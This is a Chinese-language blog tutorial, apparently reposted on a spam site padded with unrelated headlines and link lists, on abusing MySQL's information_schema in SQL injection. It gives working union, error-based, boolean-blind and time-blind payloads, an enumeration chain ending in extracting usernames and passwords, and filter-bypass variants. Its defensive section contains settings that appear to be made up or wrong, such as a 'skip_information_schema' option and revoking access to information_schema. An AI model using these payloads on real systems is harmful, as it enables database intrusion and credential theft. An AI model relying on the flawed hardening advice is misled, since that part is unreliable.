当前位置: 首页 > wzjs >正文

低成本做网站 白之家网站设计计划

低成本做网站 白之家,网站设计计划,个人网站创意,建筑网官网登录目录 一、information_schema的核心价值 二、攻击利用场景与示例 1. 联合查询注入(Union-Based) 2. 报错注入(Error-Based) 3. 布尔盲注(Boolean Blind) 4. 时间盲注(Time-Based&#xff0…

目录

一、information_schema的核心价值

二、攻击利用场景与示例

1. 联合查询注入(Union-Based)

2. 报错注入(Error-Based)

3. 布尔盲注(Boolean Blind)

4. 时间盲注(Time-Based)

三、攻击链中的关键步骤

四、不同MySQL版本的差异

五、防御策略与实战方案

1. 最小权限原则

2. 输入过滤与拦截

3. 数据库加固

4. WAF规则示例(ModSecurity)

六、进阶绕过技术及应对

1. 编码绕过

2. 替代元数据源

3. 基于时间的模糊探测

七、企业级防御架构

结语


一、information_schema的核心价值

information_schema是MySQL默认的系统数据库,存储了所有数据库的元数据信息。在SQL注入攻击中,它相当于攻击者的“地图”,用于探测目标数据库结构,具体包含以下关键表:

  • ​TABLES​​:记录所有表名及所属数据库(table_nametable_schema
  • ​COLUMNS​​:记录所有列名及所属表(column_nametable_name
  • ​SCHEMATA​​:列出所有数据库名(schema_name
  • ​USER_PRIVILEGES​​:用户权限信息
二、攻击利用场景与示例
1. 联合查询注入(Union-Based)

通过联合查询直接读取元数据:

' UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_schema=database()-- 

结果示例:

+------------+--------------+
| table_name | table_schema |
+------------+--------------+
| users      | app_db       |
| orders     | app_db       |
+------------+--------------+
2. 报错注入(Error-Based)

利用报错函数提取信息:

' AND extractvalue(1, concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1,1)))-- 

报错输出:

XPATH syntax error: '~password'
3. 布尔盲注(Boolean Blind)

逐字符猜测表名:

' AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=database() LIMIT 1)='u'-- 

若页面返回正常,说明第一个表名的首字母是u

4. 时间盲注(Time-Based)

通过延时判断数据存在性:

' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>5, SLEEP(5), 0)-- 

若响应延迟5秒,说明当前数据库存在超过5张表。

三、攻击链中的关键步骤
  1. ​枚举数据库​​:
    SELECT schema_name FROM information_schema.schemata
  2. ​定位目标表​​:
    SELECT table_name FROM information_schema.tables WHERE table_schema='app_db'
  3. ​获取字段结构​​:
    SELECT column_name FROM information_schema.columns WHERE table_name='users'
  4. ​构造最终Payload​​:
    UNION SELECT username, password FROM users-- 
四、不同MySQL版本的差异
版本范围information_schema访问特性注入影响
MySQL < 5.0information_schema需暴力猜解表名/列名
MySQL 5.0-5.6完整元数据访问,默认对所有用户可见攻击者可完整枚举数据库结构
MySQL ≥ 5.7引入performance_schema,部分权限受限SELECT权限访问元数据
五、防御策略与实战方案
1. 最小权限原则
  • ​应用账户权限配置​​:
    CREATE USER 'webapp'@'%' IDENTIFIED BY 'SecurePass123!';
    GRANT SELECT, INSERT ON app_db.users TO 'webapp'@'%';
    REVOKE SELECT ON information_schema.* FROM 'webapp'@'%';
2. 输入过滤与拦截
  • ​黑名单过滤关键词​​(正则示例):
    (information_schema\.(tables|columns)|schema_name\b)
  • ​参数化查询​​(Python示例):
    cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
3. 数据库加固
  • ​禁用元数据访问​​(需重启):
    [mysqld]
    skip_information_schema
  • ​日志监控可疑查询​​:
    SELECT * FROM mysql.general_log 
    WHERE argument LIKE '%information_schema%';
4. WAF规则示例(ModSecurity)
SecRule ARGS "@contains information_schema" \"id:1001,phase:2,deny,msg:'SQLi detected: information_schema access'"
六、进阶绕过技术及应对
1. 编码绕过
  • ​十六进制编码​​:
    UNION SELECT * FROM information_schema.`TABLES` -- 正常访问
    UNION SELECT * FROM infoorrmation_schema.`TABLES` -- 双写绕过
    ' UNION SELECT * FROM info%72mation_schema.tables -- URL编码
2. 替代元数据源

information_schema不可用时,攻击者可能尝试:

  • mysql系统库​​(需更高权限):
    SELECT db, table_name FROM mysql.db
  • ​暴力猜解​​:
    AND (SELECT COUNT(*) FROM users) > 0 -- 假设存在users表
3. 基于时间的模糊探测
IF(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1),1,1)=CHAR(97), BENCHMARK(5000000,MD5('a')),0)
七、企业级防御架构

结语

information_schema是SQL注入攻击的“战略要地”,防御需建立多层防线:

  1. ​权限最小化​​:严格限制数据库账户权限
  2. ​输入消毒​​:结合正则过滤与参数化查询
  3. ​深度监控​​:实时审计敏感元数据访问行为
  4. ​纵深防御​​:WAF与数据库防火墙联动防护

通过代码层、网络层、数据库层的三重加固,可有效遏制攻击者利用系统元数据实施数据泄露,将SQL注入的危害降到最低。


文章转载自:

http://9iHb6qqQ.kxscs.cn
http://RrtVMhNy.kxscs.cn
http://JEipo6x4.kxscs.cn
http://0cBXrS8b.kxscs.cn
http://dfIrTADU.kxscs.cn
http://7v5huiO1.kxscs.cn
http://q583ts2z.kxscs.cn
http://4fm69s54.kxscs.cn
http://n7jAxfSO.kxscs.cn
http://kva3mPu7.kxscs.cn
http://wyNoIevY.kxscs.cn
http://BMm4SBDY.kxscs.cn
http://5cRQJlPG.kxscs.cn
http://Pta6CPXu.kxscs.cn
http://S08Hkita.kxscs.cn
http://N2eIaJKq.kxscs.cn
http://fU5V1Qhq.kxscs.cn
http://lDTlgX6I.kxscs.cn
http://44wA32f6.kxscs.cn
http://HjtGYAcH.kxscs.cn
http://sumaUZDt.kxscs.cn
http://7C6cpK03.kxscs.cn
http://JhsZC3pr.kxscs.cn
http://zokMiL5i.kxscs.cn
http://pajrxi9E.kxscs.cn
http://vuQiWfR7.kxscs.cn
http://d7WSKLEQ.kxscs.cn
http://iR3Bq8OJ.kxscs.cn
http://SWMoc1gk.kxscs.cn
http://NZvmG42e.kxscs.cn
http://www.dtcms.com/wzjs/668387.html

相关文章:

  • 网站翻书效果成都网站空间创新互联
  • 建设网站的子文件夹淘宝客网站怎么做
  • 电影网站源码access电销外呼系统多少钱一个月
  • 学建站论坛青海省建设厅网站执业
  • 购物网站设计的意义租赁服务器
  • 做网站怎么接业务网站标题前的小图标怎么做
  • 仿网站源码个人网页设计作品展示
  • 网站域名代备案网站换模板要怎么做
  • 做竞品分析去哪个网站公司网站做的好的公司
  • 建设银行江苏省分行网站提供手机网站制作哪家好
  • 哈尔滨服务好的建站保险网官网
  • 论坛网站建设公司全屋定制品牌
  • 设置网站维护页面好的专业网站建设公司
  • 衡水网站建设联系电话千锋教育课程
  • 新的网站设计公司杭州传媒公司
  • 自己怎么做VIP视频解网站网上查房屋备案
  • 怎么看一个网站是哪个公司做的网站版权信息的正确写法
  • 目前网站在初级建设阶段_需要大量数据丰富cvm服务器
  • 石家庄那有建网站网站建设与更新
  • 公司网站大全网站打开速度慢的原因
  • 樟木头网站建设软件培训机构学费多少
  • 网站设计的基本步骤企业网站推广价格
  • 网站推广结束语云南建设工程有限公司
  • 效果图网站推荐大全面包砖软件开发项目经理的职责
  • 网站建设 仿站seo优化怎么做
  • 云空间网站怎么做湖北自适应网站建设报价
  • 建设网站可以先买域名吗企业软文怎么写
  • 自动建站网站源码wordpress最新版中午
  • dedecms做论坛网站珠海市建设局网站
  • 佛山做网站的公司哪家好百度推广怎么优化